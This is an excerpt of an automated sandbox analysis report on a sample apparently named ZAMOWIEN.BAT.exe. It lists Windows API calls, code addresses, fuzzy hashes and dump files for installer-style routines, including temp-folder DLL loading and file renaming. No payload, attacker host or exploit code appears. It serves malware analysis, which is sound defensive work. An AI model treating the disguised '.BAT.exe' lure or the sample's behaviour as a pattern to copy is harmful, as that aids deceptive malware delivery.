                                                                                  • Opcode Fuzzy Hash: 48d5054ae9fa3c66534243b530be4ac77275d228a2fdf316ae35e55088bcbc9e
                                                                                  • Instruction Fuzzy Hash: FCF08271A14104EFDB10EBA4DE499AEB378EF04314F6045BBF505F21E1DBB45D419B2A
                                                                                  APIs
                                                                                  • CheckDlgButton.USER32(?,-0000040A,?), ref: 00404458
                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040446C
                                                                                  • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404489
                                                                                  • GetSysColor.USER32(?), ref: 0040449A
                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A8
                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B6
                                                                                  • lstrlenW.KERNEL32(?), ref: 004044BB
                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C8
                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044DD
                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 00404536
                                                                                  • SendMessageW.USER32(00000000), ref: 0040453D
                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404568
                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045AB
                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004045B9
                                                                                  • SetCursor.USER32(00000000), ref: 004045BC
                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004045D5
                                                                                  • SetCursor.USER32(00000000), ref: 004045D8
                                                                                  • SendMessageW.USER32(00000111,?,00000000), ref: 00404607
                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404619
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                  • String ID: 1C@$Call$N
                                                                                  • API String ID: 3103080414-3974410273
                                                                                  • Opcode ID: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
                                                                                  • Instruction ID: 9026ebbe03bb6d5dcd5a9bde039089338ffc2a6a86adc40c9d49ddbc6b033b78
                                                                                  • Opcode Fuzzy Hash: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
                                                                                  • Instruction Fuzzy Hash: D161A3B1A00209BFDB109F60DD45EAA7B79FB94305F00853AF705B62E0D779A952CF68
                                                                                  APIs
                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                  • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                  • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                  • String ID: F
                                                                                  • API String ID: 941294808-1304234792
                                                                                  • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                                  • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
                                                                                  • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                                  • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
                                                                                  APIs
                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,0040606B,?,?), ref: 00405F0B
                                                                                  • GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405F14
                                                                                    • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                                                    • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                                                                  • GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405F31
                                                                                  • wsprintfA.USER32 ref: 00405F4F
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F8A
                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F99
                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD1
                                                                                  • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406027
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00406038
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603F
                                                                                    • Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                                    • Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                  • String ID: %ls=%ls$[Rename]
                                                                                  • API String ID: 2171350718-461813615
                                                                                  • Opcode ID: 452d6bb901878c0c7833dd9b0da621d42dccc5e8693507b5b61e49e3263f6faa
                                                                                  • Instruction ID: cb5629e100ec4411e7767e9ff1715c79388972a83a2f5f57e92a2ee479f5e204
                                                                                  • Opcode Fuzzy Hash: 452d6bb901878c0c7833dd9b0da621d42dccc5e8693507b5b61e49e3263f6faa
                                                                                  • Instruction Fuzzy Hash: 92313571240B19BBD230AB659D48F6B3A5CEF45744F15003BF906F72D2EA7C98118ABD
                                                                                  APIs
                                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00403334,C:\Users\user\AppData\Local\Temp\,764A3420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                                                                  • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                                                                  • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00403334,C:\Users\user\AppData\Local\Temp\,764A3420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                                                                  • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00403334,C:\Users\user\AppData\Local\Temp\,764A3420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Char$Next$Prev
                                                                                  • String ID: "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                  • API String ID: 589700163-112748494
                                                                                  • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                  • Instruction ID: 9d8e3f8f3784457604ea521ff392e3c8e3efc90107dbe880bee10e7696629eb6
                                                                                  • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                  • Instruction Fuzzy Hash: AB11B655800616A5DB303B18BC44A7762F8AF54B60F92403FED89736C5F77C5C9286BD
                                                                                  APIs
                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0040427F
                                                                                  • GetSysColor.USER32(00000000), ref: 004042BD
                                                                                  • SetTextColor.GDI32(?,00000000), ref: 004042C9
                                                                                  • SetBkMode.GDI32(?,?), ref: 004042D5
                                                                                  • GetSysColor.USER32(?), ref: 004042E8
                                                                                  • SetBkColor.GDI32(?,?), ref: 004042F8
                                                                                  • DeleteObject.GDI32(?), ref: 00404312
                                                                                  • CreateBrushIndirect.GDI32(?), ref: 0040431C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2320649405-0
                                                                                  • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                  • Instruction ID: 0f30b588a8d7f9bbf1461c481b53b443173021fc121084549064eaca6d41b1d8
                                                                                  • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                  • Instruction Fuzzy Hash: CD2174716007059FCB319F68DE48A5BBBF8AF81711B048A3EFD96A26E0D734D944CB54
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BD1
                                                                                  • GetMessagePos.USER32 ref: 00404BD9
                                                                                  • ScreenToClient.USER32(?,?), ref: 00404BF3
                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C05
                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C2B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$Send$ClientScreen
                                                                                  • String ID: f
                                                                                  • API String ID: 41195575-1993550816
                                                                                  • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                  • Instruction ID: ae0188e128420319643ad50796f74bd77cac7447aa244d18a8bf097087cf05ab
                                                                                  • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                  • Instruction Fuzzy Hash: 9C019E7190021CBAEB00DB94DD81BFFBBBCAF95711F10412BBB10B61D0C7B499418BA4
                                                                                  APIs
                                                                                  • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E11
                                                                                  • MulDiv.KERNEL32(000EDD22,00000064,000EDF26), ref: 00402E3C
                                                                                  • wsprintfW.USER32 ref: 00402E4C
                                                                                  • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                                  Strings
                                                                                  • verifying installer: %d%%, xrefs: 00402E46
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                  • String ID: verifying installer: %d%%
                                                                                  • API String ID: 1451636040-82062127
                                                                                  • Opcode ID: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
                                                                                  • Instruction ID: 4bcbb139cde21edcf0ff7b700e9789e452b98774f77cb7efe3bd4e4e9d403b43
                                                                                  • Opcode Fuzzy Hash: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
                                                                                  • Instruction Fuzzy Hash: C701F47154020CABDF209F60DE49FAA3B69EB44705F008439FA45B51E0DBB995558F98
                                                                                  APIs
                                                                                    • Part of subcall function 7050121B: GlobalAlloc.KERNEL32(00000040,?,7050123B,?,705012DF,00000019,705011BE,-000000A0), ref: 70501225
                                                                                  • GlobalFree.KERNEL32(?), ref: 7050265B
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 70502690
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33351315934.0000000070501000.00000020.00000001.01000000.00000006.sdmp, Offset: 70500000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33351257625.0000000070500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33351412590.0000000070503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33351485317.0000000070505000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_70500000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$Free$Alloc
                                                                                  • String ID:
                                                                                  • API String ID: 1780285237-0
                                                                                  • Opcode ID: 73d263d998edd89af3c0d6c7fb24de35c43f32a1733adc2b687a2f5aa454ffb7
                                                                                  • Instruction ID: 8cf791059185bf6388d1b046f2f5bcb0225b47b59295c0753a0efed1a2efb920
                                                                                  • Opcode Fuzzy Hash: 73d263d998edd89af3c0d6c7fb24de35c43f32a1733adc2b687a2f5aa454ffb7
                                                                                  • Instruction Fuzzy Hash: C131DE72504101EFD7169F76CDACD2EBFBAEB99304720496DFA428B220DB32A8149B15
                                                                                  APIs
                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                  • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                  • String ID:
                                                                                  • API String ID: 2667972263-0
                                                                                  • Opcode ID: de92c1bd6f77b34e2ba4b4bc505dbe4f635d2773414333dd82a7c43b5c6c5a79
                                                                                  • Instruction ID: 08f8d52deffd015bf7aba9006bc7b8b19cff7c85b8e7ef16137ebd65050c2e74
                                                                                  • Opcode Fuzzy Hash: de92c1bd6f77b34e2ba4b4bc505dbe4f635d2773414333dd82a7c43b5c6c5a79
                                                                                  • Instruction Fuzzy Hash: 1B218071C00528BBCF116FA5DE49D9E7E79EF08364F10023AF954762E1CB794D419B98
                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                                                                  • wsprintfW.USER32 ref: 00404B52
                                                                                  • SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                  • String ID: %u.%u%s%s$6B
                                                                                  • API String ID: 3540041739-3884863406
                                                                                  • Opcode ID: 4da95cfef184c8e5e741e241c615311e7070c24a3f1e6bca6f3b0d0e52bef44f
                                                                                  • Instruction ID: 22ef8b20c3cb34d9681d0f1950c5ee3b7e818b69147609aa9b6e87f13a537159
                                                                                  • Opcode Fuzzy Hash: 4da95cfef184c8e5e741e241c615311e7070c24a3f1e6bca6f3b0d0e52bef44f
                                                                                  • Instruction Fuzzy Hash: 18110833A041283BDB10A96D9C46F9F329CDB85374F250237FA26F21D1DA79DC2182E8
                                                                                  APIs
                                                                                  • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWidelstrlen
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp$C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll
                                                                                  • API String ID: 3109718747-2878251781
                                                                                  • Opcode ID: 9d8b4e4d9dc988721d41fde04fb3c2a1eeeffc3d26af6733c4ada06497a3d1a6
